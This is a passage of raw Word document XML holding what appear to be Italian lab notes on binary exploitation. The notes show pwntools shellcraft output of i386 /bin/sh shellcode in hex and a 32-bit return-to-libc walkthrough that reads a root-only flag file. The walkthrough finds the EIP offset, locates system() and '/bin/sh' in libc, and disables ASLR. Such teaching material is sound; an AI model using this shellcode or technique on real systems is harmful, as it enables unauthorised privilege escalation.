      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFE1B85" w14:textId="3C79A7C6" w:rsidR="009D6CE9" w:rsidRPr="00AF5671" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>… … … … … … …</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>i386.linux.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>… … … … … … …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A49C5" w14:textId="2EC5FF5E" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="009D6CE9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:t xml:space="preserve"> i386.linux.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16459E1A" w14:textId="2293DBB2" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693B0AA" w14:textId="099236FB" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Traduciamo il risultato direttamente in assembly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F546564" w14:textId="1B1339F5" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i386.linux.sh -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B55ED" w14:textId="60A683A5" w:rsidR="009D6CE9" w:rsidRPr="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="009D6CE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1368"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004214B5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004214B5" w:rsidRPr="004214B5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CCFD87C" wp14:editId="7DCA98A8">
            <wp:extent cx="3788838" cy="3032760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="131041345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3453" name="Immagine 1" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect t="3624" r="62772"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3796197" cy="30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6DA1" w14:textId="21A802BF" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>06-return_to_libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 32-bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE98B8" w14:textId="77777777" w:rsidR="00CC100E" w:rsidRDefault="00CC100E" w:rsidP="00CC100E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752CE49E" w14:textId="75C4A824" w:rsidR="00CC100E" w:rsidRPr="00CC100E" w:rsidRDefault="00CC100E" w:rsidP="00CC100E">
      <w:r w:rsidRPr="00CC100E">
        <w:t>Essenzialmente sia il 5 che q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uesto consistono nel dover leggere </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>le flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che non potrebbero essere lette in quanto non abbiamo i permessi per farlo, ma i permessi ce li ha root, per riuscire a camuffarci da root dobbiamo mandare tutto in overflow e trovare i vari offset per le funzioni che vogliamo usare (system e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> che è la libreria che ci interessa). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097E243" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRPr="00CC100E" w:rsidRDefault="00AF5671" w:rsidP="00AF5671"/>
    <w:p w14:paraId="595E409D" w14:textId="7066CC05" w:rsidR="00AF5671" w:rsidRPr="00C65D3F" w:rsidRDefault="00AF5671" w:rsidP="00C65D3F">
      <w:r w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve">$ file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t>securesever</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C65D3F" w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C65D3F" w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C65D3F" w:rsidRPr="00C65D3F">
        <w:t>dynamically</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C65D3F" w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C65D3F" w:rsidRPr="00C65D3F">
        <w:t>linked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C65D3F" w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve"> vuol dire che la</w:t>
      </w:r>
      <w:r w:rsidR="00C65D3F">
        <w:t xml:space="preserve"> funzione non è nel codice ma vengono chiamate dinamicamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E67CB" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671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checks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reserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E6B72DB" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; NX enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D53CAB" w14:textId="43F962FA" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ ls -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D125630" w14:textId="33813619" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671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ot:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FAF671" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671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ot:roo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cureserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C520D4C" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671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600 flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730AE686" w14:textId="2D6D5EA1" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671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C65D3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C65D3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C65D3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analizziamo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C65D3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C65D3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>codice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BDE36BE" w14:textId="13788341" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g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reserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45E03133" w14:textId="3FF9980E" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cyclic 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21474091" w14:textId="7FBC58CE" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve"> --&gt; e compiliamo con l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’output di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyclic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 100 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3694DB" w14:textId="6F909C5E" w:rsidR="00C65D3F" w:rsidRPr="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyclic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --&gt; quello che c’è nell’EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ECB80C" w14:textId="27DC8688" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t>Found</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t>at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve"> offset 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B49B62" w14:textId="0E09F452" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1625E2ED" w14:textId="285EA607" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve"> “bin/sh” --&gt; cerca dentro la li</w:t>
      </w:r>
      <w:r>
        <w:t>breria c l’indirizzo di memoria della funzione di c che esegue la shell.</w:t>
      </w:r>
      <w:r w:rsidR="001D00EC">
        <w:t xml:space="preserve"> Essenzialmente tramite questa particolare funzione riusciamo a darci dei privilegi che magari l’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D00EC">
        <w:t>untente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D00EC">
        <w:t xml:space="preserve"> non ci ha dato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF42F6" w14:textId="658CD7C1" w:rsidR="001D00EC" w:rsidRDefault="001D00EC" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001D00EC">
        <w:t>libc.so.6       0xea8670d5 '/bin/sh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC0D4D7" w14:textId="77777777" w:rsidR="004F7F3F" w:rsidRDefault="001D00EC" w:rsidP="00AF5671">
      <w:r w:rsidRPr="001D00EC">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D00EC">
        <w:t>ldd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D00EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D00EC">
        <w:t>secureserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D00EC">
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001D00EC">
        <w:t xml:space="preserve">list </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D00EC">
        <w:t>dynamic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D00EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D00EC">
        <w:t>dependencies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D00EC">
        <w:t>, eseguendolo più volte vedi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">amo che l’indirizzo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cambia sempre perché l’ASLR è attivo e bisogna disabilitarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2714BD5E" w14:textId="77777777" w:rsidR="004F7F3F" w:rsidRDefault="004F7F3F" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t xml:space="preserve"> 0 | sudo tee /proc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>sys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>/kernel/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --&gt; disabilita la randomizzazione se la si vuole riattivare o si fa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1 (parziale) o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2 (totale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9476AF" w14:textId="7488DAE3" w:rsidR="001D00EC" w:rsidRDefault="004F7F3F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="004F7F3F">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>readelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t xml:space="preserve"> -s /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t xml:space="preserve">/i386-linux-gnu/libc.so.6 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t xml:space="preserve"> system</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7F3F">
        <w:t xml:space="preserve"> --&gt; per trovare l’offset della funzione system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>dalla root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t xml:space="preserve"> di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ibc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D9656F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D9656F">
        <w:t>quidi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D9656F">
        <w:t xml:space="preserve"> tecnicamente se scrivessimo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D9656F">
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D9656F">
        <w:t xml:space="preserve"> puts troveremmo l’offset dalla base di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D9656F">
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D9656F">
        <w:t xml:space="preserve"> a puts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB7DE5" w14:textId="27420764" w:rsidR="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00AF5671">
      <w:r>
        <w:t>La posizione della libreria ci serve per arrivare a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379B70C" w14:textId="7EE22017" w:rsidR="004F7F3F" w:rsidRDefault="004F7F3F" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7F3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7F3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2166: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9656F">
        <w:rPr>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>00048170</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7F3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    63 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7D169" w14:textId="652B3A3B" w:rsidR="00D9656F" w:rsidRPr="00BD3AE2" w:rsidRDefault="00D9656F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>00048170</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>--&gt; offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756D78CC" w14:textId="07A6AA4D" w:rsidR="00D9656F" w:rsidRDefault="00D9656F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00D9656F">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9656F">
        <w:t>strings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9656F">
        <w:t xml:space="preserve"> -a -t x /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9656F">
        <w:t>lib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9656F">
        <w:t xml:space="preserve">/i386-linux-gnu/libc.so.6 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9656F">
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9656F">
        <w:t xml:space="preserve"> "/bin/sh"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9656F">
        <w:t xml:space="preserve"> --&gt; in questo modo mi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trovo solo l’offset da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a /bin/sh, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> legge tutta la libreria, ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ preleva quella interessata, ‘-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>a’</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scansiona la libreria e ‘-t x’ formatta in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="270F84B3" w14:textId="5A136B28" w:rsidR="00CC100E" w:rsidRDefault="00D9656F" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
